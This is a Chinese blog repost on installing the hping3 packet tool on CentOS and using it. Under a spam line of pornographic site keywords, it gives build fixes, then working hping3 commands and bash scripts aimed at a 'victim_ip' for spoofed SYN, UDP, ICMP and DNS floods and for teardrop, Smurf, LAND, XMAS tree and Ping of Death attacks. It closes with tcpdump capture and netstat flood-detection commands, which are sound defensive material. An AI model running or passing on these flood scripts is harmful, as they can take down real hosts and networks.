日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CentOS hping3安装和应用

發布時間:2023/12/14 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CentOS hping3安装和应用 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

CentOS hping3安裝和應用

  • CentOS 安裝hping3工具
    • 安裝libpcap,libpcap-devel,tcl和tcl-devel
    • hping安裝
    • 出錯后問題解決
      • configure 時候出錯
      • make找不到pcap.h
      • 找不到pcap.h
      • -ltcl -lm -lpthread
  • hping3工具的使用
    • 端口掃描
    • syn flood
    • udp flood
    • icmp flood
    • dns flood
    • teardrop
    • SMURF攻擊
    • XMAS TREE攻擊
    • LAND攻擊
    • Ping of Death攻擊
  • 抓包驗證
  • shell檢測攻擊數量
      • SYN Flood攻擊檢測
      • UDP Flood攻擊檢測
      • Lood攻擊檢測
      • ICMP Flood攻擊檢測

CentOS 安裝hping3工具

CentOS 安裝 hping3 工具!

安裝libpcap,libpcap-devel,tcl和tcl-devel

yum -y install libpcap libpcap-devel tcl tcl-devel
  • 如果找不到包,從光盤映像文件下找到這三個rpm包,手動安裝 rpm -ivh filename.rpm(忽略版本)
rpm -ivh '/root/Desktop/tcl-8.5.7-6.el6.x86_64.rpm' rpm -ivh '/root/Desktop/tcl-devel-8.5.7-6.el6.x86_64.rpm' rpm -ivh '/root/Desktop/libcap-devel-2.16-5.5.el6.x86_64.rpm' rpm -ivh '/root/Desktop/libpcap-1.4.0-1.20130826git2dbcaa1.el6.x86_64.rpm'

hping安裝

//確定pcap-bpf.h是否存在/usr/include/下,如果不存在,跳過這步,在下面libpcap-1.1.1.tar.gz的解壓包中復制過來 ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h wget http://www.hping.org/hping3-20051105.tar.gz tar zxvf hping3-20051105.tar.gz cd hping3-20051105./configure make make install

出錯后問題解決

configure 時候出錯

  • error can not find the byte order for this architecture, fix bytesex.h
    原因:
    沒有指定 x86_64 下的大小端對齊。
  • 解決方法:
    修改 bytesex.h,在 defined(i386) 后添加 defined(x86_64)。

修改前

#if defined(__i386__) \|| defined(__alpha__) \|| (defined(__mips__) && (defined(MIPSEL) || defined (__MIPSEL__)))

修改后

#if defined(__i386__) \|| defined(__x86_64__) \|| defined(__alpha__) \|| (defined(__mips__) && (defined(MIPSEL) || defined (__MIPSEL__)))

make找不到pcap.h

  • 下載libpcap-1.1.1.tar.gz
http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz tar zxvf libpcap-1.1.1.tar.gz cd libpcap-1.1.1 ./configure
  • 然后把libcap-1.9.1/pcap/中的復制到/usr/include/中或者把路徑添加到環境變量
sudo cp pcap.h /usr/include/ export C_INCLUDE_PATH=&C_INCLUDE_PATH:頭文件 source /etc/profile echo $C_INCLUDE_PATH

找不到pcap.h

  • 添加軟連接 /usr/include/net/bpf.h。
ln -sf /libpcap-1.1.1/pcap-bpf.h /usr/include/net/bpf.h

-ltcl -lm -lpthread

ln -sf libpcap.so.1.4.0 /usr/lib64/libpcap.so.1

hping3工具的使用

端口掃描

  • 通過 eth0 網口,發送 SYN 報文 到 192.168.1.12:8080
hping3 -I eth0 -S 192.168.1.12 -p 8080

syn flood

  • 默認協議: tcp; 默認源端口:隨機; 默認源地址:攻擊機的 ip 地址
通過 eth0 網口。發送 SYN 報文 到 192.168.1.12:8080。偽造源地址為192.168.1.222,時間間隔 1000us。 hping3 -I eth0 -S 192.168.1.12 -p 8080 -a 192.168.1.222 -i u1000通過 eth0 網口。發送 SYN 報文 到 192.168.1.12:8080。偽造隨機源地址,時間間隔 1000us。 hping3 -I eth0 -S 192.168.1.12 -p 8080 --rand-source -i u1000通過 eth0 網口。發送 SYN 報文 到 192.168.1.12:8080。偽造隨機源地址,洪水攻擊。 洪水攻擊,速率最快的攻擊。不會顯示數據 和 丟包的統計。 hping3 -I eth0 -S 192.168.1.12 -p 8080 --rand-source --flood

udp flood

發送 udp 報文 到 192.168.1.12:8080。 hping3 --udp 192.168.1.12 -p 8080發送 udp 報文 到 192.168.1.12:8080。偽造隨機源地址,洪水攻擊。 hping3 --udp 192.168.1.12 -p 8080 --rand-source --flood

icmp flood

發送 icmp 報文 到 192.168.1.12。 hping3 --icmp 192.168.1.12發送 icmp 報文 到 192.168.1.12。偽造隨機源地址,洪水攻擊。 hping3 --icmp 192.168.1.12 --rand-source --flood

dns flood

發送 udp 報文 到 192.168.1.12:8080。偽造隨機源地址,洪水攻擊。 hping3 --udp 192.168.1.12 -p 8080 --rand-source --flood

teardrop

  • Teardrop攻擊是一種拒絕服務攻擊。是基于病態分片數據包的攻擊方法。
    其工作原理是向被攻擊者發送多個分片的IP包(IP分片數據包中包括該分片數據包屬于哪個數據包以及在數據包中的位置等信息)。
    某些操作系統收到含有重疊偏移的偽造分片數據包時將會出現系統崩潰、重啟等現象。
#!/bin/bashfunction teardrop ( ) {local victim_ip=$1local id_begin=$2local id_end=$3for((id=${id_begin};id<${id_end};id++))dohping3 --icmp ${victim_ip} --data 1000 --id ${id} --count 1 --morefraghping3 --icmp ${victim_ip} --data 200 --id ${id} --count 1 --fragoff 400done }teardrop $*

SMURF攻擊

  • Smurf攻擊通過使用將回復地址設置成受害網絡的廣播地址的ICMP應答請求(ping)數據包,來淹沒受害主機,
    最終導致該網絡的所有主機都對此ICMP應答請求做出答復,導致網絡阻塞。
    更加復雜的Smurf將源地址改為第三方的受害者,最終導致第三方崩潰。
#!/bin/bashfunction smurf ( ) {local victim_ip=$1local broadcast_ip=$2hping3 --icmp ${broadcast_ip} -a ${victim_ip} --flood }smurf $*

XMAS TREE攻擊

  • TCP所有標志位被設置為1的數據包被稱為圣誕樹數據包(XMas Tree packet),之所以叫這個名是因為這些標志位就像圣誕樹上燈一樣全部被點亮。
hping3 -SFRP 192.168.1.12

LAND攻擊

  • LAND攻擊方式采用了特別構造的TCP SYN數據包(通常用于開啟一個新的連接),使目標機器開啟一個源地址與目標地址均為自身IP地址的空連接,持續地自我應答,消耗系統資源直至崩潰。這種攻擊方法與SYN洪泛攻擊并不相同。
#!/bin/bashfunction land ( ) {local victim_ip=$1hping3 -S ${victim_ip} -p ${victim_port} -a ${victim_ip} --flood }land $*

Ping of Death攻擊

  • Ping of Death攻擊原理是攻擊者A向受害者B發送一些尺寸超大的ICMP(Ping命令使用的是ICMP報文)報文對其進行攻擊(對于有些路由器或系統,在接收到一個這樣的報文后,由于處理不當,會造成系統崩潰、死機或重啟)。
#!/bin/bashfunction ping_of_death () {local victim_ip=$1local id=186local data_size=1450let icmp_size=${data_size}+8hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag for i in $(seq 50)dolet offset=${i}*${icmp_size}hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offsetdone }ping_of_death $*

抓包驗證

01、抓取所有網絡包,并在terminal中顯示抓取的結果,將包以十六進制的形式顯示。 tcpdump 02、抓取所有的網絡包,并存到 result.cap 文件中。 tcpdump -w result.cap 03、抓取所有的經過eth0網卡的網絡包,并存到 result.cap 文件中。 tcpdump -i eth0 -w result.cap 04、抓取源地址是192.168.1.100的包,并將結果保存到 result.cap 文件中。 tcpdump src host 192.168.1.100 -w result.cap 05、抓取地址包含是192.168.1.100的包,并將結果保存到 result.cap 文件中。 tcpdump host 192.168.1.100 -w result.cap 06、抓取目的地址包含是192.168.1.100的包,并將結果保存到 result.cap 文件中。 tcpdump dest host 192.168.1.100 -w result.cap 07、抓取主機地址為 192.168.1.100 的數據包 tcpdump -i eth0 -vnn host 192.168.1.100 08、抓取包含192.168.1.0/24網段的數據包 tcpdump -i eth0 -vnn net 192.168.1.0/24 09、抓取網卡eth0上所有包含端口22的數據包 tcpdump -i eth0 -vnn port 22 10、抓取指定協議格式的數據包,協議格式可以是「udp,icmp,arp,ip」中的任何一種,例如以下命令: tcpdump udp -i eth0 -vnn 11、抓取經過 eth0 網卡的源 ip 是 192.168.1.100 數據包,src參數表示源。 tcpdump -i eth0 -vnn src host 192.168.1.100 12、抓取經過 eth0 網卡目的 ip 是 192.168.1.100 數據包,dst參數表示目的。 tcpdump -i eth0 -vnn dst host 192.168.1.100 13、抓取源端口是22的數據包 tcpdump -i eth0 -vnn src port 22 14、抓取源ip是 192.168.1.100 且目的ip端口是22的數據包 tcpdump -i eth0 -vnn src host 192.168.1.100 and dst port 22 15、抓取源ip是192.168.1.100或者包含端口是22的數據包 tcpdump -i eth0 -vnn src host 192.168.1.100 or port 22 16、抓取源ip是192.168.1.100且端口不是22的數據包 tcpdump -i eth0 -vnn src host 192.168.1.100 and not port 22 17、抓取源ip是192.168.1.100且目的端口是22,或源ip是192.168.1.102且目的端口是80的數據包。 tcpdump -i eth0 -vnn ( src host 192.168.1.100 and dst port 22 ) or ( src host 192.168.1.102 and dst port 80 ) 18、把抓取的數據包記錄存到/tmp/result文件中,當抓取100個數據包后就退出程序。 tcpdump –i eth0 -vnn -w /tmp/result -c 100 19、從/tmp/result記錄中讀取tcp協議的數據包 tcpdump -i eth0 tcp -vnn -r /tmp/result 20、想要截獲所有192.168.1.100 的主機收到的和發出的所有的數據包: tcpdump host 192.168.1.100 21、如果想要獲取主機192.168.1.100除了和主機192.168.1.101之外所有主機通信的ip包,使用命令: tcpdump ip host 192.168.1.100 and ! 192.168.1.101 22、如果想要獲取主機 192.168.1.100 接收或發出的 telnet 包,使用如下命令: tcpdump tcp port 23 host192.168.1.100

shell檢測攻擊數量

SYN Flood攻擊檢測

netstat -nt |grep SYN_RECV |awk '/^tcp/{sub(/:.*/,"",$4);sub(/:.*/,"",$5);if($4!=$5){print $4,$5}}' |wc -l

UDP Flood攻擊檢測

netstat -nua |wc -l

Lood攻擊檢測

netstat -nt |grep SYN_RECV |awk '/^tcp/{sub(/:.*/,"",$4);sub(/:.*/,"",$5);if($4==$5){print $4,$5}}' |wc -l

ICMP Flood攻擊檢測

netstat -s | grep "ICMP messages received" | awk '{print $1}'

總結

以上是生活随笔為你收集整理的CentOS hping3安装和应用的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。